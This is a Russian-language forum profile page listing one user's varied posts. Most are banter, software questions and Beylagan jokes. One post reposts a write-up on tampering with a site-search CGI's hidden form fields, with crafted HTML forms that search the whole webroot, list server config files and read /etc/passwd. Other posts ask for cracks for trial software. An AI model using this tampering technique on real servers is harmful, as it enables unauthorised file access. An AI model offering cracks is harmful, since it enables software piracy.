Перейти к содержимому

Shirxan

Members
  • Публикации

    1576
  • Зарегистрирован

  • Посещение

  • Days Won

    1

Все публикации пользователя Shirxan

  1. Большое спасибо всем! Lain, бро, у меня WinGuard 2004 Pro =) Какая-то космическая версия будущего ;)
  2. Классная штука. Только она trial :( Лайсенсов иль кряков не имеется к ней?
  3. T-Mac - спасибо, дорогой! Ты есмЪ спасение!
  4. Shirxan

    Радио Bakililar.az

    Классно! Мне нравится. Спасибо, T- Mac!
  5. Не, система Фат... Слышал о какой-то программе Magic Folder - но нигде не могу её найти.
  6. Нужно сделать так, чтоб конкретную папку никто кроме определенного юзера не читал. Как это сделать? Как поставить пароль на папку? Как запретить доступ к логическому диску?
  7. Miqele - спасибо =) Пусть замышляют Не украдут же они у меня за ночь клавиатуру 2 MIRABELLA - тараканы - народ культурный и воспитанный. Тараканы живут в приватизированных ими помещениях типа подплинтусные новостройки, скромные постройки в Междушкафии и Запаркетье. Они вылезают культурно по ночам, собирают пищу и уходят к себе в норы. То ли дело муравьи. Невоспитанные, наглые, они захватывают места обитания, им не принадлежащие, воруют и днем и ночью. Прям как люди определенной категории. Поэтому тараканов я не опасаюсь.
  8. Сестра Брюнетка. Конечно я буду о тебе заботиться - ибо это мой долг как сознательного бейлаганца. Эшшек сюдюннян няинки довга - йогурт, тварох, пендир вя шор дя гурбан! Давидын бяйям беш ширванныг клиентдары о гядяр ди ки, hинди бизи бир адам саймыйыф гялмияжяй чагырсаг ону? Дядямизин чёряин йемийиф бяйям о Давид? Трактор киши колхозын сядри оланда Давид онун Волгасында гязмирди бяйям?
  9. Shirxan

    Выключение Xp

    2 Desperad0 Ага.. пашетъ вроде
  10. Shirxan

    Козявки

    Дали кимди?
  11. Shirxan

    Выключение Xp

    ...и если английская
  12. Shirxan

    Выключение Xp

    У меня была такая же проблема. По-моему, ХР у тебя русский и незарегистрированный. Есть специальная прога, "делающая" ХР зарегенным и полнофункциональным. Тогда все эти штуки-баги исчезают. Качаем, если винда русская:
  13. Нашел любопытный материал - думаю, будет полезен админам серверов. ----------------------------------------------------------------------------------------------------- Сколько раз уже говорили о опасности сокрытой в скрытых формах, но все равно встречаются умельцы, которые пренебрегают ею. В html-коде index'ной страницы сервера www.xxx.com есть такой вот фрагмент: (ненужные элементы дизайна удалены) <form method=POST action="/cgi-bin/wsmsearch2.cgi"> Search Site: <input type=text name="terms" size=20> <input type=hidden name=boolean value="AND"> <input type=hidden name=case value="Insensitive"> <input type=hidden name=quicksearch value="NO"> <input type=hidden name=max value="50"> <input type=hidden name=faqfile value="/opt2/xxx/httpd/htdocs _ http://www.xxx.com/ _ *.* manual/ updates/ _ http://www.xxx.com"> <input type=hidden name=resultspage value="/opt2/xxx/httpd/htdocs/results.html"> <input type=submit value="Search!"> как уже стало понятно, это скрипт поисковой системы по сайту. но вот эти строчки особенно интересны: <input type=hidden name=faqfile value="/opt2/xxx/httpd/htdocs _ http://www.xxx.com/ _ *.* manual/ updates/ _ http://www.xxx.com"> <input type=hidden name=resultspage value="/opt2/xxx/httpd/htdocs/results.html"> /opt2/xxx/httpd/htdocs - это инсталяционный путь сайта, но это еще не все. скрипт поиска берет свои данные из скрытых форм: <input type=hidden name=boolean value="AND"> <input type=hidden name=case value="Insensitive"> <input type=hidden name=quicksearch value="NO"> <input type=hidden name=max value="50"> <input type=hidden name=faqfile value="/opt2/xxx/httpd/htdocs _ http://www.xxx.com/ _ *.* manual/ updates/ _ http://www.xxx.com"> <input type=hidden name=resultspage value="/opt2/xxx/httpd/htdocs/results.html"> то есть поиск производиться в папках: manual/ updates/ и корневой папке сервера http://www.xxx.com/ _ *.* (интересно что с помощью этого поикового скрипта был обнаружен файл: www_xxx_user_list.txt в корне сервера, это список юзеров). так вот здесь можно манипулировать запросами скрипта. создаем html вот с таким кодом: <form method=POST action="http://www.xxx.com/cgi-bin/wsmsearch2.cgi"> Search Site: <input type=text name="terms" size=20> <input type=hidden name=boolean value="AND"> <input type=hidden name=case value="Insensitive"> <input type=hidden name=quicksearch value="NO"> <input type=hidden name=max value="50"> <input type=hidden name=faqfile value="/opt2/xxx/httpd/htdocs"> <input type=hidden name=resultspage value="/opt2/xxx/httpd/htdocs/results.html"> <input type=submit value="Search!"> то есть просто убираем строчки: _ http://www.xxx.com/ _ *.* manual/ updates/ _ http://www.xxx.com и выполняем поисковый запрос по всему сайту. так же можно искать файлы и в /opt2/xxx/httpd/htdocs/cgi-bin/ : <form method=POST action="http://www.xxx.com/cgi-bin/wsmsearch2.cgi"> Search Site: <input type=text name="terms" size=20> <input type=hidden name=boolean value="AND"> <input type=hidden name=case value="Insensitive"> <input type=hidden name=quicksearch value="NO"> <input type=hidden name=max value="50"> <input type=hidden name=faqfile value="/opt2/xxx/httpd/htdocs_ http://www.xxx.com/ _ *.* cgi-bin/ _ http://www.xxx.com"> <input type=hidden name=resultspage value="/opt2/xxx/httpd/htdocs/results.html"> <input type=submit value="Search!"> вот что было обнаружено в результате этих запросов: Here are your search results for the keyword(s) conf.dont_use in order of relevance. 1) conf.dont_use/srm.conf.old SIZE: 7354 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0 2) conf.dont_use/srm.conf SIZE: 7436 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0 3) conf.dont_use/sessiond.conf SIZE: 159 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0 4) conf.dont_use/mime.types SIZE: 2652 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0 5) conf.dont_use/imagemap.conf SIZE: 1062 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0 6) conf.dont_use/httpsd.conf.dave SIZE: 43652 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0 7) conf.dont_use/httpsd.conf.11-20-2001 SIZE: 43841 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0 8) conf.dont_use/httpsd.conf-backup SIZE: 13243 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0 9) conf.dont_use/httpsd.conf SIZE: 43927 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0 10) conf.dont_use/httpd.conf.vhback SIZE: 7225 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0 11) conf.dont_use/httpd.conf.11-20-2001 SIZE: 7451 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0 12) conf.dont_use/httpd.conf SIZE: 7451 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0 13) conf.dont_use/access.conf SIZE: 1725 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0 и еще один скрипт: Here are your search results for the keyword(s) securedata in order of relevance. 1) cgi-bin/conf.dont_use/resetsecuredata.cgi SIZE: bytes TYPE: CGI sсript Term: securedata Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0 Ну а всеми любимый /etc/passwd получается совсем просто : достаточно просто значение скрытого поля resultspage заменить на /etc/passwd. Вот так вот иногда администраторы сервера пытаются залатать всевозможные дыры, накатывая последние патчи, а информация утекает просто из html-кода.
  14. Слабый вестибулярный аппарат Попробуй таблетки "Аэрон". Помогает. И ещё - брось читать в транспорте! От этого любого затошнит.
  15. Жулики Опозорю всех в крупных СМИ - никто вам не поверит))
  16. Shirxan

    Козявки

    Хонымлор ве Жоноплор! Тема про козявки вновь актуальна с легкой руки Брюнетки-бажы.
  17. Здравствуйте, Janis:) Взаимно Большое спасибо! Это было действительно героическое сражение. Человек против муравьёв - Гарри Поттер и рядом не валялся. Вот только кто все это увековечит? Приходится самому -Морфин- какую фотогалерею? ;)
  18. Сестра Брюнетка! Я растроган твоей искренней заботой о Умбульнисе и Гюльчёхре! Сян бульнисая дюшсян лично мян вя Тотахан сяня бахаджайыг. О Давид Гапыр Филди кимди, онун мабилнысы вар сяндя? Гяряк чагырах бир беш ширван джибине басаг иши йахшы гёрсюн.
  19. Creation, мои мураши однажды в монитор залезли К счастью, ничего не попортили и проводов не перегрызли, видимо все там же померли от радиации Муравьиный Чернобыль
  20. qetera, сяндя бурдасан? Рад видеть тебя ;)
  21. Сестра Брюнетка. Я тронут твоей заботой о молодых бейлаганках. К сожалению, не могу сообщить хороших новостей. Умбульнисе бульнисадады, ганында джаду тапыблар. Бульниса Бейлаганын бульнисасыды, самая передовая бульниса из всех передовых бульнис. Гюльчёхря ися яхшыды. Но о ней расскажет мой брат Тотахан. Ему недавно звонил Мярдимазар, кстати, брат Тотахан, что тебе сказал Мярдимазар? Скоро ли он приедет?
  22. Салам, сестра Брюнетка. Рад тебя видеть. Ты очень правильно сказала - бейлаганские мотивы, потому что Бейлаган - это музыка. Это музыка песни двух братьев, поющих о родном крае и бесславно загубленном дереве у райцентра. Это музыка песни Мярдимазара, оторванного от родных краев бессовестной нуждой, песня души Трактора-киши - агсаггала нашего... Ах, Бейлаган!
×
×
  • Создать...